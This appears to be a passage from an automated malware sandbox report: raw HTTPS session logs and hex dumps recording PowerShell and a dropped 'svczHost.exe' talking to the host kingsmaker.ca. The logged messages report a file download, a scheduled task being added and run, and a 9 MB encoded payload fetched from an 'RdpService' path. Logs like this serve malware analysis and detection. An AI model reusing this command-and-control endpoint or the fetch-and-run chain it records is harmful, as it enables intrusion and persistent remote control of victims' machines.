                                                                                                            2024-11-29 08:09:26 UTC1369INData Raw: ce 25 01 49 8c 04 04 db 4f 01 49 8c 0c f7 d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4e ce 25 01 49 8c 04 11 db 4f 01 49 8c 0c 00 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 33 ce 25 01 49 8c 04 3a db 4f 01 49 8c 0c 2d db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 14 ce 25 01 49 8c 04 2f db 4f 01 49 8c 0c 1e db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f9 cf 25 01 49 8c 04 20 db 4f 01 49 8c 0c 13 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 da cf 25 01 49 8c 04 15 db 4f 01 49 8c 0c 04 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 bf cf 25 01 49 8c 04 16 db 4f 01 49 8c 0c 09 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a0 cf 25 01 49 8c 04 5b db 4f 01 49 8c 0c 4a db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 85 cf 25 01 49 8c 04 4c db 4f 01 49 8c 0c 3f db 4f 01 49 82 38 01 74 00
                                                                                                            Data Ascii: %IOIOI8tIN%IOIOI8tI3%I:OI-OI8tI%I/OIOI8tI%I OIOI8tI%IOIOI8tI%IOIOI8tI%I[OIJOI8tI%ILOI?OI8t
                                                                                                            2024-11-29 08:09:26 UTC1369INData Raw: 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c8 25 01 49 8c 04 96 57 90 01 49 8a 01 49 8c 0c a4 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c8 25 01 49 8c 04 8e 57 90 01 49 8a 01 49 8c 0c 74 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c8 25 01 49 8c 04 76 57 90 01 49 8a 01 49 8c 0c 5c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c8 25 01 49 8c 04 5e 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c8 25 01 49 8c 04 46 57 90 01 49 8a 01 49 8c 0c 2c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 14 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c8 25 01 49 8c 04 26 57 90 01 49 8a 01 49 8c 0c 2c ca
                                                                                                            Data Ascii: I8tI%IWIIOI8tI%IWIItOI8tI%IvWII\OI8tI%I^WIIDOI8tIg%IFWII,OI8tIG%I6WIIOI8tI'%I6WIIDOI8tI%I&WII,
                                                                                                            2024-11-29 08:09:26 UTC1369INData Raw: 01 49 8c 0c ac c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c5 25 01 49 8c 04 c6 52 90 01 49 8a 01 49 8c 0c 94 c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c5 25 01 49 8c 04 ae 52 90 01 49 8a 01 49 8c 0c 7c c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c5 25 01 49 8c 04 96 52 90 01 49 8a 01 49 8c 0c 64 c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c5 25 01 49 8c 04 8e 52 90 01 49 8a 01 49 8c 0c 64 c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c5 25 01 49 8c 04 76 52 90 01 49 8a 01 49 8c 0c 4c c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c2 25 01 49 8c 04 5e 52 90 01 49 8a 01 49 8c 0c 34 c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c2 25 01 49 8c 04 4e 52 90 01 49 8a 01 49 8c 0c 34 c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c2 25 01 49 8c 04 46 52 90 01 49
                                                                                                            Data Ascii: IOI8tI%IRIIOI8tIg%IRII|OI8tIG%IRIIdOI8tI'%IRIIdOI8tI%IvRIILOI8tI%I^RII4OI8tI%INRII4OI8tI%IFRI
                                                                                                            2024-11-29 08:09:26 UTC1369INData Raw: 04 16 50 90 01 49 8a 01 49 8c 0c dc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 be 25 01 49 8c 04 fe 51 90 01 49 8a 01 49 8c 0c d4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 be 25 01 49 8c 04 ee 51 90 01 49 8a 01 49 8c 0c bc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 bf 25 01 49 8c 04 ee 51 90 01 49 8a 01 49 8c 0c e4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 bf 25 01 49 8c 04 d6 51 90 01 49 8a 01 49 8c 0c d4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 bf 25 01 49 8c 04 be 51 90 01 49 8a 01 49 8c 0c bc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 bf 25 01 49 8c 04 a6 51 90 01 49 8a 01 49 8c 0c a4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 bf 25 01 49 8c 04 8e 51 90 01 49 8a 01 49 8c 0c ac c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 bf 25 01 49
                                                                                                            Data Ascii: PIIOI8tI'%IQIIOI8tI%IQIIOI8tI%IQIIOI8tI%IQIIOI8tI%IQIIOI8tI%IQIIOI8tIg%IQIIOI8tIG%I
                                                                                                            2024-11-29 08:09:26 UTC1369INData Raw: e8 e7 b8 25 01 49 8c 04 46 4f 90 01 49 8a 01 49 8c 0c dc c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b8 25 01 49 8c 04 76 4f 90 01 49 8a 01 49 8c 0c c4 c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b8 25 01 49 8c 04 5e 4f 90 01 49 8a 01 49 8c 0c ac c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b8 25 01 49 8c 04 4e 4f 90 01 49 8a 01 49 8c 0c 94 c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b8 25 01 49 8c 04 56 4f 90 01 49 8a 01 49 8c 0c 7c c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b8 25 01 49 8c 04 3e 4f 90 01 49 8a 01 49 8c 0c 6c c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b8 25 01 49 8c 04 3e 4f 90 01 49 8a 01 49 8c 0c 6c c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b8 25 01 49 8c 04 36 4f 90 01 49 8a 01 49 8c 0c 64 c5 4f 01 49 82 38 01 74 00 c2 49 8a
                                                                                                            Data Ascii: %IFOIIOI8tI%IvOIIOI8tI%I^OIIOI8tI%INOIIOI8tIg%IVOII|OI8tIG%I>OIIlOI8tI'%I>OIIlOI8tI%I6OIIdOI8tI
                                                                                                            2024-11-29 08:09:26 UTC1369INData Raw: 01 74 00 c2 49 8a d1 e8 87 b5 25 01 49 8c 04 06 4c 90 01 49 8a 01 49 8c 0c 4c c0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b5 25 01 49 8c 04 ee 4d 90 01 49 8a 01 49 8c 0c 34 c0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b5 25 01 49 8c 04 d6 4d 90 01 49 8a 01 49 8c 0c 1c c0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b5 25 01 49 8c 04 be 4d 90 01 49 8a 01 49 8c 0c 04 c0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b5 25 01 49 8c 04 a6 4d 90 01 49 8a 01 49 8c 0c ec c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 b2 25 01 49 8c 04 8e 4d 90 01 49 8a 01 49 8c 0c d4 c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b2 25 01 49 8c 04 76 4d 90 01 49 8a 01 49 8c 0c bc c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b2 25 01 49 8c 04 5e 4d 90 01 49 8a 01 49 8c 0c a4 c1 4f 01 49 82
                                                                                                            Data Ascii: tI%ILIILOI8tIg%IMII4OI8tIG%IMIIOI8tI'%IMIIOI8tI%IMIIOI8tI%IMIIOI8tI%IvMIIOI8tI%I^MIIOI
                                                                                                            2024-11-29 08:09:26 UTC1369INData Raw: 0c be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 ae 25 01 49 8c 04 8e 4a 90 01 49 8a 01 49 8c 0c ac be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 ae 25 01 49 8c 04 ee 4a 90 01 49 8a 01 49 8c 0c fc be 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 af 25 01 49 8c 04 46 4d 90 01 49 8a 01 49 8c 0c 44 c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 af 25 01 49 8c 04 66 4d 90 01 49 8a 01 49 8c 0c 54 c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 af 25 01 49 8c 04 9e 4d 90 01 49 8a 01 49 8c 0c 6c c1 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 af 25 01 49 8c 04 ce 4c 90 01 49 8a 01 49 8c 0c 5c c0 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 af 25 01 49 8c 04 36 4e 90 01 49 8a 01 49 8c 0c 8c c3 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 af 25 01 49 8c 04 66 4e 90 01 49 8a 01 49 8c
                                                                                                            Data Ascii: OI8tI'%IJIIOI8tI%IJIIOI8tI%IFMIIDOI8tI%IfMIITOI8tI%IMIIlOI8tI%ILII\OI8tIg%I6NIIOI8tIG%IfNII


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.11.3049756172.67.179.674435936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:36 UTC284OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1
                                                                                                            Content-Type: application/json
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: kingsmaker.ca
                                                                                                            Content-Length: 200
                                                                                                            2024-11-29 08:09:36 UTC200OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 63 6f 6d 70 6c 65 74 65 64 3a 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 54 68 65 20 66 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 20 77 61 73 20 70 72 6f 63 65 73 73 65 64 20 61 6e 64 20 73 61 76 65 64 20 61 73 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 73 76 63 7a 48 6f 73 74 2e 65 78 65 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                            Data Ascii: [ "\"Download completed: C:\\\\Windows\\\\Temp\\\\file\"", "\"The file C:\\\\Windows\\\\Temp\\\\file was processed and saved as C:\\\\Windows\\\\Temp\\\\svczHost.exe\"", "----------"]
                                                                                                            2024-11-29 08:09:37 UTC993INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:09:37 GMT
                                                                                                            Content-Length: 0
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DbJW%2BFfDU6iWSjSe2D7hj%2F31WR0ZCoLOLw%2Br1FZJwmgc19o81CRRqk4nVLHVBlvyDp2fmr3EvtEnlKZaAmg3%2FZxpGUL497rkdUpGNzrA66nIO1ftlqpEzcXcgXqC17cJjMD%2F%2FgRBxiIB"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1264&min_rtt=1133&rtt_var=120&sent=18&recv=22&lost=0&retrans=0&sent_bytes=13899&recv_bytes=9358&delivery_rate=9598246&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11dd6eccd09f7-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=158590&min_rtt=158525&rtt_var=33549&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1144&delivery_rate=24123&cwnd=252&unsent_bytes=0&cid=0fe2f2941086d25a&ts=680&x=0"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.11.3049757172.67.179.674435936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:37 UTC283OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1
                                                                                                            Content-Type: application/json
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: kingsmaker.ca
                                                                                                            Content-Length: 97
                                                                                                            2024-11-29 08:09:37 UTC97OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 44 65 74 65 6c 65 20 46 69 6c 65 20 43 3a 5c 5c 5c 5c 57 69 6e 64 6f 77 73 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 66 69 6c 65 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 61 64 64 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                            Data Ascii: [ "\"Detele File C:\\\\Windows\\\\Temp\\\\file\"", "\"add task\"", "----------"]
                                                                                                            2024-11-29 08:09:38 UTC993INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:09:38 GMT
                                                                                                            Content-Length: 0
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sLg%2BU31hYgVwZfRBHxGL6pYajmPbTrLsC3PF5bxcaltQoe8uqVciE03qxglm2qZdGCefpDKI0ksnCKybxo0dYPppnMZsElhUs8ObSGR%2FP4O1Xn3vzRWKQcUj9xMpcW4Dl5afxdaTr0Yt"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1851&min_rtt=1140&rtt_var=256&sent=7107&recv=3447&lost=0&retrans=0&sent_bytes=10143412&recv_bytes=5116&delivery_rate=26545454&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11ddd5a6a0ad9-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=158840&min_rtt=158736&rtt_var=33646&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1040&delivery_rate=24079&cwnd=252&unsent_bytes=0&cid=66d3e36fd7f118d4&ts=706&x=0"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.11.3049758172.67.179.674435936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:40 UTC283OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1
                                                                                                            Content-Type: application/json
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: kingsmaker.ca
                                                                                                            Content-Length: 64
                                                                                                            2024-11-29 08:09:40 UTC64OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 20 74 61 73 6b 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 6b 65 74 20 74 68 75 63 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                            Data Ascii: [ "\"run task\"", "\"ket thuc\"", "----------"]
                                                                                                            2024-11-29 08:09:41 UTC995INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:09:41 GMT
                                                                                                            Content-Length: 0
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LyaFWCX8PIm53uOPksEWZZGJFQSCkHWhZfBBnSGhciENDi0GrCVtGyyxuvn5uxK1gakexYq736iN7YAALkaPwVYN4yOJTxIjo%2Fm46J57uYt7f56Oz%2FAZmt%2BrpN2l3mrwmfRWDP9PSF74"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1910&min_rtt=1140&rtt_var=186&sent=7167&recv=3482&lost=0&retrans=0&sent_bytes=10223074&recv_bytes=6961&delivery_rate=30598802&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11deefe000add-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=159230&min_rtt=159165&rtt_var=33683&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1007&delivery_rate=24030&cwnd=252&unsent_bytes=0&cid=96a038050eacb153&ts=686&x=0"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.11.3049761172.67.179.674439708C:\Windows\Temp\svczHost.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:10:27 UTC63OUTGET /StaticFile/RdpService/79 HTTP/1.1
                                                                                                            Host: kingsmaker.ca
                                                                                                            2024-11-29 08:10:27 UTC1152INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:10:27 GMT
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Length: 9429504
                                                                                                            Connection: close
                                                                                                            content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                            hash: 10C767E2635167724D6A03475ED8F7A9
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=soXVvszMLymMOIIyif81bVV7JB6l3EHL7OCSMKjnvTOagrr4MBMV4MHCySQIxszbOV9bg7sTqBMvEQDGbBoVmGzDf4w1a16BJ%2BiHvlzULKXKXzrwkRq40vu7TPaeuatfEb2jFNLQi89w"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=53068&min_rtt=1140&rtt_var=5696&sent=7262&recv=3582&lost=0&retrans=0&sent_bytes=10256406&recv_bytes=51402&delivery_rate=30598802&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11f10df8109f3-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=158954&min_rtt=158932&rtt_var=33565&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=701&delivery_rate=24086&cwnd=252&unsent_bytes=0&cid=fd79cc21d9050804&ts=728&x=0"
                                                                                                            2024-11-29 08:10:27 UTC217INData Raw: 02 15 df 4f 4c 4f 4f 4f 4b 4f 4f 4f b0 b0 4f 4f f7 4f 4f 4f 4f 4f 4f 4f 0f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4e 4f 4f 41 50 f5 41 4f fb 46 82 6e f7 4e 03 82 6e 1b 27 26 3c 6f 3f 3d 20 28 3d 2e 22 6f 2c 2e 21 21 20 3b 6f 2d 2a 6f 3d 3a 21 6f 26 21 6f 0b 00 1c 6f 22 20 2b 2a 61 42 42 45 6b 4f 4f 4f 4f 4f 4f 4f a1 a2 79 6f e5 c3 17 3c e5 c3 17 3c e5 c3 17 3c ec bb 84 3c eb c3 17 3c 95 42 16 3d f2 c3 17 3c e5 c3 16 3c 63 c2 17 3c f5 47 14 3d f6 c3 17 3c f5 47 13 3d dc c3 17 3c ad 46 12 3d e6 c3 17 3c 95 42 13 3d e7 c3 17 3c e5 c3 17 3c e4 c3 17 3c f5 47 12 3d 93 c3 17 3c ad
                                                                                                            Data Ascii: OLOOOKOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOONOOAPAOFnNn'&<o?= (=."o,.!! ;o-*o=:!o&!oo" +*aBBEkOOOOOOOyo<<<<<B=<<c<G=<G=<F=<B=<<<G=<
                                                                                                            2024-11-29 08:10:27 UTC1369INData Raw: 46 17 3d e4 c3 17 3c ad 46 15 3d e4 c3 17 3c 1d 26 2c 27 e5 c3 17 3c 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 1f 0a 4f 4f 2b c9 47 4f 9c 2f 7e 28 4f 4f 4f 4f 4f 4f 4f 4f bf 4f 6d 4f 44 4d 41 66 4f 71 1f 4f 4f db 0e 4f 4f 53 53 4f d7 9e 44 4f 4f 5f 4f 4f 4f 4f 4f 0f 4e 4f 4f 4f 4f 5f 4f 4f 4f 4d 4f 4f 49 4f 4f 4f 4f 4f 4f 4f 49 4f 4f 4f 4f 4f 4f 4f 4f 0f e1 4f 4f 4b 4f 4f 4f 4f 4f 4f 4c 4f 2f ce 4f 4f 5f 4f 4f 4f 4f 4f 4f 5f 4f 4f 4f 4f 4f 4f 4f 4f 5f 4f 4f 4f 4f 4f 4f 5f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 5f 4f 4f 4f 4f 86 ea 4f 47 4d 4f 4f 47 84 ea 4f 33 4e 4f 4f 4f 5f e1 4f fd 4a 4f 4f 4f cf e7 4f b7 c9 4a 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 6f e1 4f 03 5b 4f 4f df e2 d6 4f 53 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f cf e0 d6 4f 67 4f 4f 4f
                                                                                                            Data Ascii: F=<F=<&,'<OOOOOOOOOOOOOOOOOO+GO/~(OOOOOOOOOmODMAfOqOOOOSSODOO_OOOOONOOOO_OOOMOOIOOOOOOOIOOOOOOOOOOKOOOOOOLO/OO_OOOOOO_OOOOOOOO_OOOOOO_OOOOOOOOOO_OOOOOGMOOGO3NOOO_OJOOOOJOOOOOOOOOOoO[OOOSOOOOOOOOOOOOOOOOOOOOgOOO
                                                                                                            2024-11-29 08:10:27 UTC1369INData Raw: c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 73 97 67 4f 07 c2 4a e2 c0 17 4f 07 c2 42 d1 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 50 97 67 4f 07 c2 4a ef c0 17 4f 07 c2 42 de c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 4d 97 67 4f 07 c2 4a b4 c0 17 4f 07 c2 42 a3 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 aa 98 67 4f 07 c2 4a a1 c0 17 4f 07 c2 42 90 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 87 98 67 4f 07 c2 4a ae c0 17 4f 07 c2 42 9d c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e4 98 67 4f 07 c2 4a 9b c0 17 4f 07 c2 42 8a c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c1 98 67 4f 07 c2 4a 88 c0 17 4f 07 c2 42 f7 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 3e 98 67 4f 07 c2 4a f5 c0 17 4f 07 c2 42 e4 c0 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 1b 98 67 4f 07 c2 4a e2 c0
                                                                                                            Data Ascii: OvO:NsgOJOBOvO:NPgOJOBOvO:NMgOJOBOvO:NgOJOBOvO:NgOJOBOvO:NgOJOBOvO:NgOJOBOvO:N>gOJOBOvO:NgOJ
                                                                                                            2024-11-29 08:10:27 UTC1369INData Raw: 4f 3a 4e 8c 07 c4 9f a6 a6 9d 67 4f 07 c2 4a 1d dd 17 4f 07 c2 42 0c dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 83 9d 67 4f 07 c2 4a 02 dd 17 4f 07 c2 42 71 dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e0 9d 67 4f 07 c2 4a 07 dd 17 4f 07 c2 42 76 dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 dd 9d 67 4f 07 c2 4a 74 dd 17 4f 07 c2 42 63 dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 3a 9d 67 4f 07 c2 4a 61 dd 17 4f 07 c2 42 50 dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 17 9d 67 4f 07 c2 4a 66 dd 17 4f 07 c2 42 55 dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 74 9d 67 4f 07 c2 4a 6b dd 17 4f 07 c2 42 5a dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 51 9d 67 4f 07 c2 4a d0 dd 17 4f 07 c2 42 df dd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 4e 9d 67 4f 07 c2 4a d5 dd 17 4f 07 c2 42 c4
                                                                                                            Data Ascii: O:NgOJOBOvO:NgOJOBqOvO:NgOJOBvOvO:NgOJtOBcOvO:N:gOJaOBPOvO:NgOJfOBUOvO:NtgOJkOBZOvO:NQgOJOBOvO:NNgOJOB
                                                                                                            2024-11-29 08:10:27 UTC1369INData Raw: cc 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 25 82 67 4f 07 c2 4a 1c 40 e9 4f 07 c4 4f 07 c2 42 46 cc 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 05 82 67 4f 07 c2 4a 3c 40 e9 4f 07 c4 4f 07 c2 42 4e cc 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 65 82 67 4f 07 c2 4a 14 40 e9 4f 07 c4 4f 07 c2 42 a6 cd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 45 82 67 4f 07 c2 4a 34 40 e9 4f 07 c4 4f 07 c2 42 a6 cd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 a5 83 67 4f 07 c2 4a 2c 40 e9 4f 07 c4 4f 07 c2 42 9e cd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 85 83 67 4f 07 c2 4a 04 40 e9 4f 07 c4 4f 07 c2 42 a6 cd 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 e5 83 67 4f 07 c2 4a 0c 40 e9 4f 07 c4 4f 07 c2 42 4e cc 17 4f 07 cc 76 4f 3a 4e 8c 07 c4 9f a6 c5 83 67 4f 07 c2 4a 64 40 e9 4f 07 c4 4f 07 c2 42
                                                                                                            Data Ascii: OvO:N%gOJ@OOBFOvO:NgOJ<@OOBNOvO:NegOJ@OOBOvO:NEgOJ4@OOBOvO:NgOJ,@OOBOvO:NgOJ@OOBOvO:NgOJ@OOBNOvO:NgOJd@OOB
